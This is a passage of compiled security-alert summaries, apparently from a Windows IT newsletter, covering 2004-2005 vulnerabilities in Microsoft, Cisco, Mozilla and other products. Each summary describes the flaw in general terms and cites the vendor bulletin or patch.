problem. In the meantime, you should set permissions on the directory
accordingly.
http://www.winnetmag.com/article/articleID/43415/43415.html

Security Alert, August 13, 2004

Cross-Site Scripting and Spoofing Vulnerability in Exchange 5.5 SP4 with OWA
A cross-site scripting and spoofing vulnerability in Microsoft
Exchange Server 5.5 Service Pack 4 (SP4) could let an attacker
convince a Microsoft Outlook Web Access (OWA) user to run a malicious
script. This vulnerability could let an attacker access any data on
the OWA server that the user could access. Microsoft has released
bulletin MS04-026, "Vulnerability in Exchange Server 5.5 Outlook Web
Access Could Allow Cross-Site Scripting and Spoofing Attacks
(842436)," to address this vulnerability and recommends that affected
users apply the appropriate patch listed in the bulletin.
http://www.winnetmag.com/article/articleid/43653/43653.html

Security Alert, June 24, 2004

Denial of Service in WinAgents TFTP Server for Windows
Global Security Solution IT discovered that a Denial of Service
(DoS) condition exists in WinAgents Software Group's TFTP Server for
Windows. By requesting a file with an overly long filename string, a
potential attacker can cause the system to crash, resulting in a
remote DoS condition. WinAgents Software Group has been notified but
hasn't released a patch or workaround for this vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=43034

Security Alert, February 15, 2005

Vulnerability in PNG Processing Could Allow Remote Code Execution
Vulnerabilities exist because of the way the affected software handles PNG files. A remote intruder could use malicious Web content that contains corrupt or malformed PNG files to execute code on the affected system. A successful exploit could allow the intruder to take complete control of the system. Microsoft has released Security Bulletin MS05-009, "Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2053:28C14

Vulnerability in the License Logging Service Could Allow Code Execution
A vulnerability exists in the License Logging service that could allow a remote intruder to execute code on a user's system. A successful exploit could allow the intruder to take complete control of the user's system. Microsoft has released Security Bulletin MS05-010, "Vulnerability in the License Logging Service Could Allow Code Execution (885834)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2052:28C14

Server Message Block Could Allow Remote Code Execution
A vulnerability exists in Server Message Block (SMB) that could allow a remote intruder to take complete control of a user's system.
Microsoft has released Security Bulletin MS05-011, "Vulnerability in Server Message Block Could Allow Remote Code Execution (885250)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2051:28C14

Vulnerability in OLE and COM Could Allow Remote Code Execution
A vulnerability in the way memory is accessed when processing COM-based storage files could allow the locally logged-on user to take complete control of the OS. A vulnerability in the way OLE processes input validation could allow a remote intruder to execute code on a user's system. A successful exploit could allow the intruder to take complete control of the user's system. Microsoft has released Security Bulletin MS05-012, "Vulnerability in OLE and COM Could Allow Remote Code Execution (873333)" and a patch to correct the problem.
http://list.windowsitpro.com/t?ctl=2050:28C14

Security Alert, October 19, 2004

Arbitrary Code Execution in Microsoft Excel
Brett Moore discovered that a vulnerability in Microsoft Excel
could result in the arbitrary execution of code on the affected
system. This vulnerability is a result of an unchecked buffer. A
potential attacker who successfully exploited the vulnerability could
take complete control of an affected system. Microsoft has released
bulletin MS04-033, "Vulnerability in Microsoft Excel Could Allow
Remote Code Execution (886836)," to address this vulnerability and
recommends that affected users apply the appropriate patch listed in
the bulletin.
http://www.windowsitpro.com/article/articleid/44265/44265.html
Arbitrary Code Execution in Windows
Brett Moore, eEye Digital Security, Patrick Porlan, and "hlt"
discovered four vulnerabilities in various versions of Windows
that can result in the arbitrary execution of code on the affected system.
These vulnerabilities exist in the Window management system, Virtual
DOS Machine (VDM), Graphics Rendering Engine, and the Windows kernel.
Microsoft has released bulletin MS04-032, "Security Update for
Microsoft Windows (840987)," to address these vulnerabilities and
recommends that affected users apply the appropriate patch listed in
the bulletin.
http://www.windowsitpro.com/article/articleid/44264/44264.html

6/23/04
Denial of Service in Cisco IOS
A Cisco Systems' device running Internetwork Operating System (IOS)
and enabled for the Border Gateway Protocol (BGP) is vulnerable to a
Denial of Service (DoS) attack from a malformed BGP packet. By sending
a malformed BGP packet to the device, a potential attacker could cause
the device to reload. Cisco Systems has released Security Advisory
50321, "Cisco IOS Malformed BGP Packet Causes Reload," to address this
vulnerability and recommends that affected users immediately apply the
appropriate patch listed in the bulletin.
http://secadministrator.com/articles/index.cfm?articleid=43035

Security Alert, July 2, 2004

Cross-Site Scripting Vulnerability in Cart32
Dr. Ponidi discovered that McMurtrey/Whitaker & Associates' Cart32
contains a cross-site scripting vulnerability that could let a
potential remote attacker insert third-party content in a Web site.
The vendor hasn't released a fix for this vulnerability.
http://secadministrator.com/articles/index.cfm?articleid=43119

Security Alert, July 16, 2004

Arbitrary Code-Execution Vulnerability in Mozilla
Keith McCanless discovered a vulnerability in Windows-based versions
of Mozilla products that involves the use of the shell: scheme Uniform
Resource Identifiers (URIs), which are passed to the OS for handling.
The effects of the vulnerability depend on the version of Windows, but
on Windows XP it's possible to launch executables in known locations
or the default handlers for file extensions. An attacker could combine
this effect with a known buffer overrun in any of the affected Mozilla
programs to create a remote execution exploit. The Mozilla Foundation
has released the security bulletin "What Mozilla users should know
about the shell: protocol security issue," which addresses this
vulnerability, and recommends that affected users immediately apply
the appropriate patch listed in the bulletin or upgrade to the latest
software release.
http://secadministrator.com/articles/index.cfm?articleid=43263

Security Alert, November 22, 2004

Denial of Service in Cisco IOS
Cisco Systems reported a Denial of Service (DoS) vulnerability in
its Cisco IOS devices that run branches of IOS version 12.2S and that
have a DHCP server or relay agent enabled. Certain crafted DHCP
packets might be undeliverable but will remain in the queue instead of
being dropped. If so many packets are sent that they equal the size of
the input queue, no more traffic will be accepted on that interface,
resulting in a DoS condition. Cisco Systems has released Cisco
Security Advisory "Cisco IOS DHCP Blocked Interface Denial-of-Service"
to address this vulnerability.
http://www.windowsitpro.com/article/articleid/44565/44565.html

Security Alert, July 23, 2004

Privilege-Elevation Vulnerability in Windows POSIX OS Subsystem